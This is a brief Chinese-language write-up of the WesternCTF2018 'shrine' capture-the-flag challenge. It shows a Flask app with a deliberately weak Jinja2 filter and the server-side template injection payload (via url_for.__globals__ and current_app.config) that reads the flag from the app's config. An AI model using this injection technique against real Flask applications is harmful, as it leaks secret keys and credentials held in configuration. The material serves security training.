[WesternCTF2018]shrine

[WesternCTF2018]shrine
flask框架

import flask
import os

app = flask.Flask(__name__)

app.config['FLAG'] = os.environ.pop('FLAG') 


@app.route('/')
def index():
    return open(__file__).read()


@app.route('/shrine/<path:shrine>')
def shrine(shrine):

    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{
    {% set {}=None%}}'.format(c) for c in blacklist]) + s

    return flask.render_template_string(safe_jinja(shrine))


if __name__ == '__main__':
    app.run(debug=True)

os.environ.pop(‘FLAG’) 获取环境变量 存放在名为FLAG的config中
那么目的就是获取config中的值
flask框架首先考虑模板注入ssti

测试：


执行函数的黑名单有两个：config和self
不过python还有一些内置函数，比如url_for和get_flashed_messages
使用url_for测试：

shrine/{
    {
    url_for.__globals__}}

可以执行，查看current_app的配置信息：

shrine/{
    {
    url_for.__globals__['current_app'].config}}